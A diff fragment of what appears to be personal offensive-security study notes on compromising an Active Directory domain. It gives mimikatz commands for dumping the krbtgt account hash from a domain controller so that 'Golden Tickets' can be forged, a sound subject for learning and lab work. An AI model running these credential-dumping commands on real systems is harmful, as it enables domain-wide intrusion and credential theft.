Ju-On/Offensive-Security/Attacking AD 4: Domain Compromise.md

 4. This allows us to generate tickets if we have the hash of the krbtgt account
 5. With the hash of the krbtgt account we can use it to access service and resource or create a 'Golden Ticket' and use that for access.

-**From the DC, run as admin on cmd.exe and the following:**
+**From the DC, run cmd.exe as admin and the following:**
     mimikatz.exe
     privilige::debug
     lsadump::lsa /inject /name:krbtgt

 ![image](https://github.com/user-attachments/assets/7baacf00-be56-46aa-ba61-88670fbc1574)